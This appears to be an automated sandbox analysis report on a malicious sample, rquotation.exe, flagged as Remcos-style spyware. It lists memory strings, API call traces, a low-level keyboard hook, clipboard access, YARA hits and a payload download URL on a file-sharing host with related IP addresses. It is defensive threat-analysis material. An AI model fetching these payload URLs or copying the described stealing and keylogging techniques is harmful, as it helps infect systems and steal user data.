              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: rquotation.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: rquotation.exe, 00000004.00000002.3282295810.0000000006378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/
              Source: rquotation.exe, 00000004.00000002.3282295810.0000000006378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/FYmv
              Source: rquotation.exe, 00000004.00000002.3282592886.0000000007D10000.00000004.00001000.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4MzBf/gdugm184.bin
              Source: rquotation.exe, 00000004.00000003.3116127986.00000000063DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4MzBf/gdugm184.bin0
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4MzBf/gdugm184.bine
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: rquotation.exe, 00000004.00000003.3116127986.00000000063DE000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000003.3129303182.00000000063E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/
              Source: rquotation.exe, 00000004.00000003.3116127986.00000000063DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/0
              Source: rquotation.exe, 00000004.00000003.3116127986.00000000063DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/1&
              Source: rquotation.exe, 00000004.00000003.3116127986.00000000063DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/al
              Source: rquotation.exe, 00000004.00000003.3129303182.00000000063E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/MzdfMzIxNzQ4MzBf?temp_key=%81%DB%A0%9B_8n%29&inl
              Source: rquotation.exe, 00000004.00000003.3116127986.00000000063DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/s
              Source: rquotation.exe, rquotation.exe, 00000007.00000002.3183123096.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: rquotation.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv1B9B.tmp.5.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 59436 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59437
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59436
              Source: unknownNetwork traffic detected: HTTP traffic on port 59437 -> 443
              Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.5:59436 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 38.108.185.68:443 -> 192.168.2.5:59437 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\rquotation.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\rquotation.exeJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405050
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040987A
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004098E2
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_00406DFC
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_00406E9F
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004068B5
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3282295810.00000000063DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3281675400.0000000005FDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rquotation.exe PID: 6512, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: rquotation.exe
              Source: C:\Users\user\Desktop\rquotation.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00401806 NtdllDefWindowProc_W,5_2_00401806
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_004018C0 NtdllDefWindowProc_W,5_2_004018C0
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004016FD NtdllDefWindowProc_A,6_2_004016FD
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004017B7 NtdllDefWindowProc_A,6_2_004017B7
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00402CAC NtdllDefWindowProc_A,7_2_00402CAC
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00402D66 NtdllDefWindowProc_A,7_2_00402D66
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004030D9
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004030D9
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004030D9
              Source: C:\Users\user\Desktop\rquotation.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile created: C:\Windows\resources\0809\Godtager22Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_004063440_2_00406344
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_0040488F0_2_0040488F
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_004063444_2_00406344
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_0040488F4_2_0040488F
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374AB5C14_2_374AB5C1
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374B71944_2_374B7194
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044B0405_2_0044B040
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0043610D5_2_0043610D
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_004473105_2_00447310
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044A4905_2_0044A490
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040755A5_2_0040755A
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0043C5605_2_0043C560
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044B6105_2_0044B610
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044D6C05_2_0044D6C0
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_004476F05_2_004476F0
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044B8705_2_0044B870
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044081D5_2_0044081D
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_004149575_2_00414957
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_004079EE5_2_004079EE
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00407AEB5_2_00407AEB
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044AA805_2_0044AA80
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00412AA95_2_00412AA9
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00404B745_2_00404B74
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00404B035_2_00404B03
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044BBD85_2_0044BBD8
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00404BE55_2_00404BE5
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00404C765_2_00404C76
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00415CFE5_2_00415CFE
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00416D725_2_00416D72
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00446D305_2_00446D30
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00446D8B5_2_00446D8B
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00406E8F5_2_00406E8F
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004050386_2_00405038
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0041208C6_2_0041208C
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004050A96_2_004050A9
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0040511A6_2_0040511A
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0043C13A6_2_0043C13A
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004051AB6_2_004051AB
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004493006_2_00449300
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0040D3226_2_0040D322
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0044A4F06_2_0044A4F0
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0043A5AB6_2_0043A5AB
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004136316_2_00413631
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004466906_2_00446690
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0044A7306_2_0044A730
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004398D86_2_004398D8
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004498E06_2_004498E0
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0044A8866_2_0044A886
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0043DA096_2_0043DA09
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00438D5E6_2_00438D5E
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00449ED06_2_00449ED0
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0041FE836_2_0041FE83
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00430F546_2_00430F54
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004050C27_2_004050C2
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004014AB7_2_004014AB
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004051337_2_00405133
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004051A47_2_004051A4
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004012467_2_00401246
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_0040CA467_2_0040CA46
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004052357_2_00405235
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004032C87_2_004032C8
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004222D97_2_004222D9
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004016897_2_00401689
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00402F607_2_00402F60
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_004063448_2_00406344
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_0040488F8_2_0040488F
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsn5AC3.tmp\System.dll 98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 00402A3A appears 51 times
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\rquotation.exeCode function: String function: 00416760 appears 69 times
              Source: rquotation.exeStatic PE information: invalid certificate
              Source: rquotation.exe, 00000004.00000002.3303223061.000000003748B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs rquotation.exe
              Source: rquotation.exe, 00000004.00000003.3178902135.000000000642A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs rquotation.exe
              Source: rquotation.exe, 00000004.00000003.3197521207.0000000006439000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs rquotation.exe
              Source: rquotation.exe, 00000004.00000003.3180728290.0000000006433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs rquotation.exe
              Source: rquotation.exeBinary or memory string: OriginalFileName vs rquotation.exe
              Source: rquotation.exeBinary or memory string: OriginalFilename vs rquotation.exe
              Source: rquotation.exe, 00000007.00000002.3183123096.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs rquotation.exe
              Source: rquotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@10/21@4/4
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004182CE
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004030D9
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004030D9
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,7_2_00410DE1
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004030D9
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_0040431C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,0_2_0040431C
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00413D4C
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_0040205E LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,0_2_0040205E
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,5_2_0040B58D
              Source: C:\Users\user\Desktop\rquotation.exeFile created: C:\Users\user\kompatibleJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-OMNE4N
              Source: C:\Users\user\Desktop\rquotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsq53DC.tmpJump to behavior
              Source: rquotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\rquotation.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile read: C:\Users\desktop.iniJump to behavior
